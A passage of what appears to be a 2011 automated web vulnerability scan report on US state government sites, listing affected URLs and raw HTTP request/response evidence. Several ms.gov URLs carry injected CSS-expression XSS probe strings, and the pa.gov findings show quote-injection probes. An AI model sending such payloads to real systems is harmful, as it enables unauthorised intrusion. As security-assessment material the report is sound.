28.46. http://tools.google.com/service/update2
28.47. https://treas-secure.treas.state.mi.us/eservice_enu/
28.48. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
28.50. https://web.globalpay.com/taxpayer/default.asp
28.51. http://www.alabama.gov/portal/common/feedback.jsp
28.52. http://www.alabama.gov/sliverheader/Welcome.do
28.53. https://www.alabamainteractive.org/abc_license/
28.54. https://www.alabamainteractive.org/arecmenu/welcome.action
28.55. http://www.ct.gov/ctportal/assets/templates/62/css/print.css
28.56. http://www.ct.gov/ctportal/cwp/a
28.57. http://www.ct.gov/favicon.ico
28.58. http://www.dot.state.tx.us/txdoteforms/GetForm
28.59. http://www.dyve.net/jquery/
28.60. http://www.georgia.gov/favicon.ico
28.61. http://www.hoosierdata.in.gov/nav.asp
28.62. http://www.in.gov/sliverheader/Welcome.do
28.63. http://www.labor.vermont.gov/sections/wfd/training/wiatrain/index.cfm
28.64. http://www.legis.louisiana.gov/boards/board_members.asp
28.65. http://www.legis.state.la.us/billdata/bytype.asp
28.66. http://www.legis.state.la.us/puls_main.htm
28.67. http://www.missingkids.com/cybertip/
28.68. http://www.nccourts.org/Citizens/GoToCourt/Default.asp
28.69. http://www.nccourts.org/Forms/FormSearchResults.asp
28.70. http://www.nccourts.org/Support/FAQs/FAQs.asp
28.71. http://www.nhfishandgame.com/
28.72. http://www.nhfishandgame.com/cgi-bin/gl/outdoor.cgi
28.73. http://www.nhfishandgame.com/nh/
28.74. https://www.paybill.com/payccu/
28.75. http://www.sled.state.sc.us/sled/default.asp
28.76. http://www.state.nj.us/cgi-bin/corrections/njnewsline/view_article.pl
28.77. http://www.sus.edu/CatSubCat/CatSubCat.asp
28.78. http://www.txdot.gov/txdoteforms/GetForm
28.79. https://www.vitalchek.com/order_step_js.aspx
28.80. http://www.webtools.ca.gov/javascript/shared/weather2/weather3.js.asp
29. HTML uses unrecognised charset
30. Content type incorrectly stated
30.1. http://api.flickr.com/services/rest/
30.2. https://app.mobilestorm.com/cp/manageforms/preview.php
30.3. http://data.gosquared.com/info
30.4. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.000009872950613498688/blur
30.5. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.001998334191739559/blur
30.6. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.0026780031621456146/blur
30.7. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.011548380833119154/blur
30.8. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.01971346652135253/blur
30.9. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.022341948002576828/blur
30.10. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.02552951965481043/blur
30.11. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.04267080337740481/blur
30.12. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.04323508660309017/blur
30.13. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.044262538431212306/blur
30.14. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.060621748911216855/blur
30.15. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.06715349410660565/blur
30.16. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.07685435866005719/blur
30.17. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.09363480005413294/blur
30.18. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.10315419943071902/blur
30.19. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.11289626965299249/blur
30.20. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.11589423776604235/blur
30.21. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.12988923490047455/blur
30.22. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.13738619000650942/blur
30.23. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.138584119733423/blur
30.24. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.1699286277871579/blur
30.25. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.17060571792535484/blur
30.26. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.17085690842941403/blur
30.27. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.17398039577528834/blur
30.28. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.1774560243356973/blur
30.29. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.18011080077849329/blur
30.30. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.18388619902543724/blur
30.31. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.1858982944395393/blur
30.32. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.19640426943078637/blur
30.33. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.19923278456553817/blur
30.34. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.20630339859053493/blur
30.35. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.24649194884113967/blur
30.36. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.2514170885551721/blur
30.37. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.2516566349659115/blur
30.38. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.2637447805609554/blur
30.39. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.28566303313709795/blur
30.40. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.2876860585529357/blur
30.41. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3019666268955916/blur
30.42. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.30537568125873804/blur
30.43. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3157538343220949/blur
30.44. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3249114565551281/blur
30.45. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.33584522688761353/blur
30.46. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3467109438497573/blur
30.47. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3481709277257323/blur
30.48. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3624314337503165/blur
30.49. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.38390326127409935/blur
30.50. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.38600696669891477/blur
30.51. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.40151602448895574/blur
30.52. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4050266451667994/blur
30.53. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4068455633241683/blur
30.54. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4138688885141164/blur
30.55. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.41853372333571315/blur
30.56. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.429519847035408/blur
30.57. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4363963413052261/blur
30.58. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.44046534434892237/blur
30.59. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4425783231854439/blur
30.60. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.4540047354530543/blur
30.61. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.45804641279391944/blur
30.62. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.49180271849036217/blur
30.63. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.500924386549741/blur
30.64. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5069206766784191/blur
30.65. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5099691387731582/blur
30.66. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5208840556442738/blur
30.67. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5211261368822306/blur
30.68. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5360172654036433/blur
30.69. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5386203117668629/blur
30.70. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5455857384949923/blur
30.71. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5471443922724575/blur
30.72. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5550143918953836/blur
30.73. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5863302680663764/blur
30.74. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.594650394981727/blur
30.75. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5956144810188562/blur
30.76. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6021819114685059/blur
30.77. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6179129627998918/blur
30.78. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6373290235642344/blur
30.79. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6486031790263951/blur
30.80. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6607160025741905/blur
30.81. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6617095449473709/blur
30.82. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6921457799617201/blur
30.83. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6926347883418202/blur
30.84. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6938011264428496/blur
30.85. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7019346773158759/blur
30.86. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.715909109916538/blur
30.87. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7213846454396844/blur
30.88. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7216604244895279/blur
30.89. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7247910390142351/blur
30.90. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7289540111087263/blur
30.91. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7393709721509367/blur
30.92. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7429176256991923/blur
30.93. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7457810698542744/blur
30.94. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7577714030630887/blur
30.95. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7647813553921878/blur
30.96. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.771832418628037/blur
30.97. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7730976778548211/blur
30.98. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7768238643184304/blur
30.99. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7811430096626282/blur
30.100. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7813084367662668/blur
30.101. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7839354085735977/blur
30.102. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7843597154133022/blur
30.103. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7869180392008275/blur
30.104. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7918125691358/blur
30.105. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8042216831818223/blur
30.106. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8088590698316693/blur
30.107. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8120218790136278/blur
30.108. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8208005137275904/blur
30.109. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8334101843647659/blur
30.110. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8426639721728861/blur
30.111. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8459921134635806/blur
30.112. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8527416458819062/blur
30.113. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8612566720694304/blur
30.114. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.888174522202462/blur
30.115. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.8932765168137848/blur
30.116. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9015116489026695/blur
30.117. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9020833417307585/blur
30.118. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9022978853899986/blur
30.119. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9131813035346568/blur
30.120. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9280000494327396/blur
30.121. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9323878902941942/blur
30.122. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9361629660706967/blur
30.123. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9456879969220608/blur
30.124. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9502052108291537/blur
30.125. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9559315296355635/blur
30.126. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9581880448386073/blur
30.127. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9663452641107142/blur
30.128. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.968449151609093/blur
30.129. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9736038320697844/blur
30.130. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9872054078150541/blur
30.131. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.9883057198021561/blur
30.132. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.07331018731929362/blur
30.133. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.12472099298611283/blur
30.134. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.18714607320725918/blur
30.135. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.1872362329158932/blur
30.136. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.2141191172413528/blur
30.137. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.21521809720434248/blur
30.138. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.21795565215870738/blur
30.139. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.22715646773576736/blur
30.140. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.23163565923459828/blur
30.141. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.30029481556266546/blur
30.142. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.33089457359164953/blur
30.143. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.3843667053151876/blur
30.144. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.41453591943718493/blur
30.145. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.4250001448672265/blur
30.146. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.4458236221689731/blur
30.147. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.49288138072006404/blur
30.148. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.5206995762418956/blur
30.149. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.5421753553673625/blur
30.150. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.5555199990049005/blur
30.151. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.6276831564027816/blur
30.152. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.6466669554356486/blur
30.153. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.7472825900185853/blur
30.154. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.7475871213246137/blur
30.155. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.7839805490802974/blur
30.156. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.811701592290774/blur
30.157. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.8338523292914033/blur
30.158. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.8455094299279153/blur
30.159. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.8464667112566531/blur
30.160. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.870363011257723/blur
30.161. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.8804292443674058/blur
30.162. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.884554136544466/blur
30.163. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.9358769238460809/blur
30.164. http://data.ok.gov/views.json
30.165. http://data.osbm.state.nc.us/pls/linc/dyn_linc_main.show
30.166. http://de.gov/images/favicon.ico
30.167. http://doa.alaska.gov/dmv/scripts/style.css
30.168. https://dotax.ehawaii.gov/efile/css/stylesheet.css
30.169. https://dotax.ehawaii.gov/favicon.ico
30.170. https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp
30.171. http://feeds.feedburner.com/~s/kansasgovwhatsnew
30.172. http://ga.gov/gta/images/webpage/link_icon.gif
30.173. http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_878.aspx
30.174. http://johncarney.house.gov/profiles/house/themes/house/images/favicon.ico
30.175. http://kdkgllry.netmng.com/
30.176. http://kentucky.gov/_layouts/Authenticate.aspx
30.177. http://kodakgallery-kg.baynote.net/baynote/tags3/common
30.178. http://kodakimagingnetworki.tt.omtrdc.net/m2/kodakimagingnetworki/mbox/standard
30.179. http://landmark-project.com/feed2js/feed2js.php
30.180. http://maps.google.com/maps/api/js
30.181. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate
30.182. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo
30.183. http://mi.gov/favicon.ico
30.184. http://mi.gov/images/som/governor_309187_7.gif
30.185. http://mibid.bidcorp.com/Auctions/Files/Auction_28057/thumbnail/car1.jpg
30.186. http://mibid.bidcorp.com/Auctions/Files/Auction_28059/thumbnail/img_1345.jpg
30.187. http://mibid.bidcorp.com/Auctions/Files/Auction_28060/thumbnail/img_1353.jpg
30.188. http://mibid.bidcorp.com/Auctions/Files/Auction_28061/thumbnail/img_1354.jpg
30.189. http://mibid.bidcorp.com/Auctions/Files/Auction_28079/thumbnail/m3493a.jpg
30.190. http://mibid.bidcorp.com/Auctions/Files/Auction_28084/thumbnail/dvd1.jpg
30.191. http://mibid.bidcorp.com/Auctions/Files/Auction_28086/thumbnail/img_1031.jpg
30.192. http://mibid.bidcorp.com/Auctions/Files/Auction_28089/thumbnail/img_1034.jpg
30.193. http://mibid.bidcorp.com/Auctions/Files/Auction_28090/thumbnail/cam1.jpg
30.194. http://mibid.bidcorp.com/Auctions/Files/Auction_28092/thumbnail/misc1.jpg
30.195. https://moversguide.usps.com/icoa/flow.do
30.196. http://newbrowse.livehelper.com/servlet/a
30.197. http://nj.gov/nj/images/library/com/com_211_new2.gif
30.198. https://njmvcscheduling.state.nj.us/tc/driverlogin.do
30.199. http://nv.gov/RSSFeed.aspx
30.200. https://onestop.michigan.gov/onestop-main/OneStop/images/buttonEnabled.png
30.201. https://onestop.michigan.gov/onestop-main/OneStop/images/buttonHover.png
30.202. http://oregon.gov/js/oc-resources/marquee.js
30.203. https://pixel.fetchback.com/serve/fb/pdc
30.204. https://seal.verisign.com/getseal
30.205. http://serverapi.arcgisonline.com/jsapi/arcgis/
30.206. http://services.ito.state.il.us/agencycomponents/getBPFeatures.cfm
30.207. http://shots.snap.com/snap_shots.js
30.208. http://thumbnail.api.livestream.com/thumbnail
30.209. http://tn.gov/includes/alert/alert.shtml
30.210. https://treas-secure.treas.state.mi.us/eservice_enu/images/mich_2.gif
30.211. http://twitter.com/statuses/user_timeline/IDAHOgov.json
30.212. http://urls.api.twitter.com/1/urls/count.json
30.213. http://wbtdcs.nara.gov/wtid.js
30.214. https://www.accesskansas.org/favicon.ico
30.215. http://www.alabama.gov/portal/common/subNav.jsp
30.216. http://www.colorado.gov/cs/Satellite
30.219. http://www.delaware.gov/images/favicon.ico
30.220. http://www.delaware.gov/pipe/logos/blog_blog_gis.gif
30.221. http://www.ehawaii.gov/dakine/favicon.ico
30.222. http://www.employment.oregon.gov/js/oc-resources/marquee.js
30.223. http://www.georgiawildlife.com/favicon.ico
30.224. http://www.hoosierdata.in.gov/nav.asp
30.225. http://www.in.gov/dwd/2217.js
30.226. http://www.kansas.gov/favicon.ico
30.227. http://www.legis.state.pa.us/cfdocs/legis/PN/Public/btCheck.cfm
30.228. http://www.michigan.gov/favicon.ico
30.229. http://www.michigan.gov/images/Banner_81725_7.jpg
30.230. http://www.michigan.gov/images/E-file_81726_7.jpg
30.231. http://www.michigan.gov/images/FAQs_81728_7.jpg
30.232. http://www.michigan.gov/images/Forms_81729_7.jpg
30.233. http://www.mo.gov/wp-content/themes/Mo.gov/bavicon.ico
30.234. http://www.mo.gov/wp-content/uploads/2011/04/CW150_logo.gif
30.236. http://www.ms.gov/favicon.ico
30.237. http://www.ms.gov/how_do_i_fulllist.jsp
30.238. http://www.ms.gov/how_do_i_sub_answer_page.jsp
30.239. http://www.ms.gov/images/hdr_
30.240. http://www.ms.gov/images/hdr_'
30.241. http://www.ms.gov/images/hdr_'%20stYle='x:expre/**/ssion(netsparker(9)).gif
30.242. http://www.ms.gov/images/hdr_46e740
30.243. http://www.ms.gov/images/hdr_featured_sites_
30.244. http://www.ms.gov/images/hdr_featured_sites_'
30.245. http://www.ms.gov/images/hdr_featured_sites_'%20stYle='x:expre/**/ssion(netsparker(9)).gif
30.246. http://www.ms.gov/images/hdr_featured_sites_46e740
30.247. http://www.ms.gov/images/hdr_how_do_i_
30.248. http://www.ms.gov/images/hdr_how_do_i_'
30.249. http://www.ms.gov/images/hdr_how_do_i_'%20stYle='x:expre/**/ssion(netsparker(9)).gif
30.250. http://www.ms.gov/images/hdr_how_do_i_46e740
30.251. http://www.ms.gov/images/hdr_online_services_
30.252. http://www.ms.gov/images/hdr_online_services_'%20stYle='x:expre/**/ssion(netsparker(9)).gif
30.253. http://www.ms.gov/images/hdr_online_services_46e740
30.254. http://www.ms.gov/ms_sub_sub_template.jsp
30.255. http://www.ms.gov/pics/amlogo.gif
30.256. http://www.nh.gov/favicon.ico
30.257. http://www.nist.gov/favicon.ico
30.259. http://www.ri.gov/favicon.ico
30.260. http://www.ri.gov/img/governmentbox/seal.gif
30.261. http://www.state.mn.us/mn/content_images/images/ExploreMN_Logo_nspallet_copy.jpg
30.262. http://www.state.mn.us/mn/content_images/images/ad_license-minnesota.jpg
30.263. http://www.state.mn.us/mn/content_images/images/governor-dayton_northstar-ad.jpg
30.264. https://www.tennesseeanytime.org/favicon.ico
30.265. https://www.tennesseeanytime.org/includes/alert/alert.shtml
30.266. http://www.tn.gov/css/fonts/aller_it-webfont.woff
30.267. http://www.tn.gov/css/fonts/aller_lt-webfont.woff
30.268. http://www.tn.gov/css/fonts/aller_rg-webfont.woff
30.269. http://www.tn.gov/includes/alert/alert.shtml
30.270. http://www.utah.gov/keywordsearch/applicationcount.html
30.271. http://www.utah.gov/locationaware/ipLookUp.html
30.272. http://www.utah.gov/whatsnew/files/image-4739
30.273. https://www.vermontjoblink.com/ada/global/style/cfmstyle.css
30.274. http://www.visitflorida.com/includes/js/footerSurvey.php
30.275. http://www.vitalchek.com/js/google_analytics_js.aspx
30.276. https://www.vitalchek.com/AjaxFAQServer.aspx
30.277. https://www.vitalchek.com/AjaxOrderStepServer.aspx
30.279. https://www.vitalchek.com/js/google_analytics_js.aspx
30.280. https://www.vitalchek.com/order_step_js.aspx
30.281. http://www.webtools.ca.gov/javascript/shared/weather2/weather3.js.asp
31. Content type is not specified
31.1. http://newchat.livehelper.com/servlet/lhChat
31.2. http://sc.gov/Pages/images/ajax-loader.gif
31.3. http://sc.gov/_catalogs/masterpage/custom_functions.js
31.4. http://server.iad.liveperson.net/hc/33511087/
31.6. http://tomcat2.dot.state.ga.us/favicon.ico
31.7. https://www.accesskansas.org/uccsearch/index.html
31.8. http://www.osc.state.ny.us/redirect_social.php
| Severity: | High |
| Confidence: | Tentative |
| Host: | https://assist.dhss |
| Path: | /PGM/ASP/SC020.asp |
| GET /PGM/ASP/SC020.asp?hdn Host: assist.dhss.delaware.gov Connection: keep-alive Referer: https://assist.dhss Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDACRDBQAB |
| HTTP/1.1 500 Internal Server Error Set-Cookie: assist-persist=170663852 Date: Sat, 30 Apr 2011 01:14:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Pragma: no-cache Content-Length: 13487 Content-Type: text/html Expires: Sat, 30 Apr 2011 01:14:26 GMT Cache-control: no-cache <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html LANG="EN"> <head> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <meta HTTP-EQUIV="Pragma" CONTENT ...[SNIP]... |
| GET /PGM/ASP/SC020.asp?hdn Host: assist.dhss.delaware.gov Connection: keep-alive Referer: https://assist.dhss Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDACRDBQAB |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Date: Sat, 30 Apr 2011 01:14:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Pragma: no-cache Content-Length: 10617 Content-Type: text/html Expires: Sat, 30 Apr 2011 01:14:30 GMT Cache-control: no-cache <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html LANG="en"> <head> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <meta HTTP-EQUIV="Pragma" CONTE ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://pa.gov |
| Path: | /portal/server.pt/gateway |
| GET /portal/server.pt/gateway%2527/PTARGS_0_2_24662_2966 Host: pa.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ASP.NET_SessionId |
| HTTP/1.1 200 OK Connection: close Date: Sat, 30 Apr 2011 12:24:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 PT-HTTPResponse-Type: SESSION_TIMEOUT PT-Login-URL: http://pa.gov/portal Pragma: no-cache Content-Language: en Set-Cookie: plloginoccured=false; path=/ Set-Cookie: REQUESTURLBEFORESSO=; path=/ Expires: 1304079887496 Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0 Last-Modified: 1304166287496 Content-Type: text/html; charset=utf-8 Content-Length: 33559 <html> <head><link type="text/css" href="http://www.portal ...[SNIP]... ject, like a hashtable. **/ var gSafeJSVarContainer = new Object(); /** Define a new safe variable, pass the in the name and the value.Returns true if successful, method call will fail if the value is invalid. **/ function addSafeVar(strName, oValue) { gSafeJSVarContainer return true; } /** Retrieve a safe var. Returns false if the variable is undefined or if the value is actually fal ...[SNIP]... |
| GET /portal/server.pt/gateway%2527%2527/PTARGS_0_2_24662_2966 Host: pa.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ASP.NET_SessionId |
| HTTP/1.1 302 Found Connection: close Date: Sat, 30 Apr 2011 12:24:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /portal/SSORedirect.aspx? Set-Cookie: plloginoccured=false; path=/ Set-Cookie: REQUESTURLBEFORESSO=http: Set-Cookie: ASP.NET_SessionId=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 357 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="/portal/SSORedirect </body></html> <!--Hostname: ENCTCISP270--><!--Total Request Time: -1 Con ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://pa.gov |
| Path: | /portal/server.pt/gateway |
